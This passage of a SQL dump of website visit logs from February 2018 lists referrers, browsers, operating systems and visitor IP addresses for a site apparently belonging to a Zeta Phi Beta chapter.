5','000',1,0),(19507,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.117','000',1,0),(19508,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.39','000',1,0),(19509,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.113','000',1,0),(19510,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.112','000',1,0),(19511,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.16','000',1,0),(19512,'2018-02-05','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','173.67.32.133','000',5,0),(19513,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.23','000',1,0),(19514,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.218','000',1,0),(19515,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.83','000',1,0),(19516,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.11','000',1,0),(19517,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.222','000',1,0),(19518,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.220','000',1,0),(19519,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.137','000',1,0),(19520,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.187','000',2,0),(19521,'2018-02-05','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(19522,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.103','000',2,0),(19523,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.215','000',1,0),(19524,'2018-02-05','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',1,0),(19525,'2018-02-05','zphiblgz.org','Chrome','Windows','50.0.2661.75','','203.129.113.142','000',3,0),(19526,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.209','000',1,0),(19527,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.208','000',1,0),(19528,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.196','000',1,0),(19529,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.194','000',1,0),(19530,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.196','000',1,0),(19531,'2018-02-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.14','000',1,0),(19532,'2018-02-06','zphiblgz.org','Chrome','Windows','50.0.2661.75','','203.129.113.142','000',2,0),(19533,'2018-02-06','zphiblgz.org','Chrome','Windows','50.0.2661.75','','82.165.140.254','000',1,0),(19534,'2018-02-06','zphiblgz.org','Chrome','Windows','50.0.2661.75','','5.2.211.92','000',1,0),(19535,'2018-02-06','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.28','000',1,0),(19536,'2018-02-06','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',3,0),(19537,'2018-02-06','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.89','000',1,0),(19538,'2018-02-06','https://zphiblgz.org','Opera','Unknown','9.15','','60.249.181.127','000',1,0),(19539,'2018-02-06','https://zphiblgz.org','Opera','Unknown','9.15','','207.248.251.82','000',1,0),(19540,'2018-02-06','https://zphiblgz.org','Python','Unknown','3.5','','52.22.209.17','000',2,0),(19541,'2018-02-06','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(19542,'2018-02-06','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(19543,'2018-02-06','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',2,0),(19544,'2018-02-06','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1689.sIBt6UQDhR2zl7WfQhcQTc0s2w0XothGRUI6Ar2TfTU.79c226c6f0fa8c704d126d2947170ccc158b3003&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042LVZrb0R4SE9KWHdQSjFOR2xQQndNbVNoaVNGeFNXcU9KS2ExdjBEU2F5Zyws&sign=842aa1fba2035856382a7e6d2ad8d671&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.209.193','000',2,0),(19545,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.178','000',1,0),(19546,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.58','000',1,0),(19547,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.198','000',1,0),(19548,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.216','000',1,0),(19549,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.138','000',2,0),(19550,'2018-02-06','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1689.3jecvlsqjpwGdnCmuCYBEzQyZgXLpC9OZTzbs3yEhwk.b8d6af650f60722e32c686aabb3e3d9eeda86dc4&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043U0NqamNpREtib2J2cVE2NThWNG16LUZfQ2FLdDB0LV93UDd3V19HOVY2dyws&sign=04f8eeb2104c398b610de69a7a4b7aa5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.62.111.188','000',2,0),(19551,'2018-02-06','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1689.9a7kB-8pT5GT_cKX__paRZnXTSNRXexaCdbHu0tLwAM.a46a7e82551bc33d7f80a946a7edb52eddd38f45&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040S0hUQUxQWXdaWjRFUWdXdklVcjdXY0EwOVM3eHlUdnVZLWlndjBES3J5Zyws&sign=2cdc2612f3cd4335b286021415e0ad1b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.105.53','000',2,0),(19552,'2018-02-06','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1689.dfINNB8UgLYUHqKb2QPMXSDcTT2GAeB6PGdXGp2ntqY.4267f253d9c92885163234418978aa95a7c07671&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040RW9WWGFaS2UzQWZGVTBLdS1IbzBSR1dXazJCc2YtcDQtSkQwalN4STRZUSws&sign=cf1cdfefb0a9ae7b05009c353e389a7a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.14.95','000',2,0),(19553,'2018-02-06','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.86','000',2,0),(19554,'2018-02-06','https://zphiblgz.org','Chrome','Macintosh','55.0.2883.95','','34.216.172.56','000',2,0),(19555,'2018-02-06','https://www.google.com/','Chrome','Windows','63.0.3239.132','','205.222.248.62','000',6,0),(19556,'2018-02-06','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.54.42','000',1,0),(19557,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.47','000',4,0),(19558,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.228.122','000',2,0),(19559,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.80','000',1,0),(19560,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.231','000',1,0),(19561,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.86','000',1,0),(19562,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.115','000',2,0),(19563,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.209','000',1,0),(19564,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.85','000',1,0),(19565,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.116','000',2,0),(19566,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.93','000',2,0),(19567,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.26','000',2,0),(19568,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.80','000',1,0),(19569,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.205','000',4,0),(19570,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.205','000',3,0),(19571,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.73','000',1,0),(19572,'2018-02-06','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.25.153','000',1,0),(19573,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',2,0),(19574,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.225','000',1,0),(19575,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.117','000',1,0),(19576,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.119','000',1,0),(19577,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.22','000',1,0),(19578,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.214','000',4,0),(19579,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.91','000',1,0),(19580,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.40','000',1,0),(19581,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.217','000',2,0),(19582,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.54','000',3,0),(19583,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.119','000',1,0),(19584,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.17','000',1,0),(19585,'2018-02-06','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','166.137.240.19','000',2,0),(19586,'2018-02-06','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','107.77.202.5','000',3,0),(19587,'2018-02-06','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','71.179.81.192','000',4,0),(19588,'2018-02-06','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.242.32','000',1,0),(19589,'2018-02-06','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.23.108','000',1,0),(19590,'2018-02-06','https://zphiblgz.org','Safari','iPhone','11.0','','166.216.165.96','000',1,0),(19591,'2018-02-06','https://www.google.com/','Chrome','Android','64.0.3282.137','','172.58.185.40','000',4,0),(19592,'2018-02-06','https://zphiblgz.org','Firefox','Linux','24.0','','172.58.185.40','000',5,0),(19593,'2018-02-06','https://zphiblgz.org','Safari','iPhone','11.0','','172.58.185.128','000',6,0),(19594,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.11','000',5,0),(19595,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.121','000',1,0),(19596,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.29','000',1,0),(19597,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.227','000',1,0),(19598,'2018-02-06','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','129.78.110.124','000',2,0),(19599,'2018-02-06','https://zphiblgz.org','Safari','iPhone','11.0','','188.71.232.246','000',2,0),(19600,'2018-02-06','https://www.google.com/','Chrome','iPhone','64.0.3282.112','','104.183.24.83','000',3,0),(19601,'2018-02-06','https://www.google.com/','Chrome','Chrome OS','63.0.3239.140','','173.67.16.175','000',5,0),(19602,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.17','000',2,0),(19603,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.107','000',3,0),(19604,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.105','000',2,0),(19605,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.224','000',1,0),(19606,'2018-02-06','https://zphiblgz.org/scholarship/','Firefox','Windows','57.0','','198.51.197.42','000',1,0),(19607,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.199','000',2,0),(19608,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.71','000',1,0),(19609,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.202','000',1,0),(19610,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.141','000',1,0),(19611,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.54','000',1,0),(19612,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.121','000',3,0),(19613,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.99','000',2,0),(19614,'2018-02-06','https://zphiblgz.org','Safari','Windows','4.1','','182.74.170.150','000',1,0),(19615,'2018-02-06','https://zphiblgz.org','Firefox','Macintosh','36.0','','134.119.223.242','000',1,0),(19616,'2018-02-06','https://zphiblgz.org','Chrome','Macintosh','37.0.810.0','','103.251.164.4','000',1,0),(19617,'2018-02-06','https://zphiblgz.org','MSIE','Windows','7.0','','178.197.248.211','000',1,0),(19618,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.199','000',1,0),(19619,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.118','000',1,0),(19620,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.212','000',2,0),(19621,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.123','000',1,0),(19622,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.224','000',1,0),(19623,'2018-02-06','https://www.google.com/','Chrome','Windows','63.0.3239.132','','129.2.181.161','000',6,0),(19624,'2018-02-06','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1689.DLWR3kTUapeA6nnBoAq0Enle801an68YHfYRUmdHMWGOmR3rDvAKW377OKM9UG_r.c4ff9fef91cbb5202ff4deb864c74843e6f14caa&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YD4hgzqAYr5iuWBiLZQy-rY&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlmNkdLRVlvQkZZY0NUa3FpMkdyYlA3YUhoTlllZWZ0VmJvby1JZGkweHNLV2NhSXJ5cHQ2TVhGUDFzeVhLcWVEcno2SnVfVGxpTUN4dU9qeEw4R3J1Zw&b64e=2&sign=e481cf192585a8118b8b8d98582f86a0&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbiwd1phmO8Dyrtfr6abnE55wd0Caow3d0tZG3fAzOHz3cYcgq6bwny3JfedZNSASP-Fs0MV2_33GeUtyIL735jTrqUSG8IHmcfHYlfLhk5oDSKr_O_5juYrth2wJsMHWQD&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXmyCrj7VrKuKOqYMIa9lMxLQ3fYI3wBX_zJMhDY4_N37IEj9vw3xLKTZdiVhJamXxGtqj2XWJAhw&l10n=ru&cts=1517941335784&mc=7.31057837902','MSIE','Windows','8.0','','5.165.250.134','000',1,0),(19625,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.214','000',1,0),(19626,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.84','000',1,0),(19627,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.115','000',1,0),(19628,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.50','000',1,0),(19629,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.118','000',2,0),(19630,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.181','000',2,0),(19631,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.128','000',1,0),(19632,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.176','000',1,0),(19633,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.151','000',1,0),(19634,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.56','000',2,0),(19635,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.75','000',2,0),(19636,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.45','000',1,0),(19637,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.44','000',1,0),(19638,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.107','000',1,0),(19639,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.117','000',1,0),(19640,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.112','000',1,0),(19641,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.231','000',1,0),(19642,'2018-02-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(19643,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.213','000',1,0),(19644,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.210','000',1,0),(19645,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.85','000',2,0),(19646,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.192','000',1,0),(19647,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.52','000',1,0),(19648,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.117','000',2,0),(19649,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.178','000',2,0),(19650,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.211','000',1,0),(19651,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.152','000',1,0),(19652,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.113','000',2,0),(19653,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.114','000',1,0),(19654,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.199','000',3,0),(19655,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.66','000',1,0),(19656,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.125','000',1,0),(19657,'2018-02-06','https://owa.howardcc.edu/owa/redir.aspx?REF=1J4b1_ko32a_eqivgA86sd0TxWaejpQPv3N5u5NX2RIoYlA9qG3VCAFodHRwczovL3pwaGlibGd6Lm9yZy9zY2hvbGFyc2hpcC8.','Safari','iPad','11.0','','71.121.163.58','000',2,0),(19658,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.87','000',2,0),(19659,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.204','000',1,0),(19660,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.202','000',1,0),(19661,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.210','000',1,0),(19662,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.196','000',1,0),(19663,'2018-02-06','https://owa.howardcc.edu/owa/redir.aspx?REF=tbf2XMeEX2GnxQOUjSVQzwGbP3bMwPx8GTkW12s_PVKLxqqXqW3VCAFodHRwczovL3pwaGlibGd6Lm9yZy9zY2hvbGFyc2hpcC8.','Silk','Kindle Fire','63.1.34','','73.213.26.166','000',4,0),(19664,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.214','000',2,0),(19665,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.150','000',2,0),(19666,'2018-02-06','https://zphiblgz.org','Chrome','Android','63.0.3239.111','','174.205.2.189','000',2,0),(19667,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.137','000',1,0),(19668,'2018-02-06','https://owa.howardcc.edu/owa/','Edge','Windows','15.15063','','100.16.227.176','000',2,0),(19669,'2018-02-06','https://zphiblgz.org','Safari','iPhone','11.0','','172.56.3.195','000',2,0),(19670,'2018-02-06','https://owa.howardcc.edu/owa/','Safari','iPhone','11.0','','174.205.14.119','000',2,0),(19671,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.211','000',2,0),(19672,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.196','000',1,0),(19673,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.169','000',2,0),(19674,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.55','000',1,0),(19675,'2018-02-06','https://owa.howardcc.edu/owa/','Chrome','Windows','63.0.3239.132','','204.126.132.241','000',2,0),(19676,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.113','000',3,0),(19677,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.101','000',1,0),(19678,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.118','000',2,0),(19679,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.208','000',1,0),(19680,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.147','000',1,0),(19681,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.179','000',1,0),(19682,'2018-02-06','https://zphiblgz.org','Safari','iPad','9.0','','73.173.201.172','000',2,0),(19683,'2018-02-06','https://zphiblgz.org','MSIE','Windows','8.0','','209.222.83.71','000',3,0),(19684,'2018-02-06','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.154.141','000',3,0),(19685,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.214','000',5,0),(19686,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.117','000',1,0),(19687,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.88','000',3,0),(19688,'2018-02-06','https://zphiblgz.org','Safari','iPhone','11.0','','73.213.33.149','000',2,0),(19689,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.171','000',2,0),(19690,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.23','000',1,0),(19691,'2018-02-06','https://zphiblgz.org/','Safari','Macintosh','11.0.2','','63.155.121.163','000',2,0),(19692,'2018-02-06','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.198.80.227','000',1,0),(19693,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.117','000',2,0),(19694,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.43','000',1,0),(19695,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.231','000',2,0),(19696,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.198','000',1,0),(19697,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.29','000',1,0),(19698,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.219','000',1,0),(19699,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.204','000',1,0),(19700,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.213','000',1,0),(19701,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.52','000',1,0),(19702,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.179','000',2,0),(19703,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.6','000',1,0),(19704,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.219','000',1,0),(19705,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.23','000',1,0),(19706,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.7','000',1,0),(19707,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.115','000',1,0),(19708,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.216','000',1,0),(19709,'2018-02-06','https://www.google.com/search?q=zeta+phi+beta+graduate+chapters+in+maryland&client=ms-android-att-us&hl=en-US&prmd=sinv&ei=2T96WoPfF4nIsQXEyL7gAg&start=10&sa=N&biw=360&bih=615','Android Browser','Android','4.0','','107.77.204.113','000',2,0),(19710,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.220','000',1,0),(19711,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.58','000',3,0),(19712,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.31','000',5,0),(19713,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.20','000',2,0),(19714,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.213','000',2,0),(19715,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.183','000',2,0),(19716,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.101','000',1,0),(19717,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.19','000',1,0),(19718,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.213','000',1,0),(19719,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.21','000',2,0),(19720,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.142','000',2,0),(19721,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.133','000',1,0),(19722,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.201','000',1,0),(19723,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.177','000',1,0),(19724,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.7','000',1,0),(19725,'2018-02-06','https://zphiblgz.org','Chrome','Macintosh','37.0.2117.32','','107.175.128.126','000',2,0),(19726,'2018-02-06','https://www.google.com/','Safari','iPhone','11.0','','209.198.12.162','000',4,0),(19727,'2018-02-06','https://www.google.com/','Chrome','Windows','64.0.3282.140','','98.254.238.138','000',1,0),(19728,'2018-02-06','https://pills24h.com/buy-doxycycline-online-without-prescription/','MSIE','Windows','6.0','','46.118.225.78','000',3,0),(19729,'2018-02-06','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','75.181.34.154','000',2,0),(19730,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.72','000',1,0),(19731,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.114','000',1,0),(19732,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.201','000',1,0),(19733,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.120','000',1,0),(19734,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.119','000',2,0),(19735,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.114.72','000',1,0),(19736,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.113.135','000',1,0),(19737,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.113.187','000',1,0),(19738,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.113.182','000',1,0),(19739,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.113.119','000',1,0),(19740,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','31.13.114.71',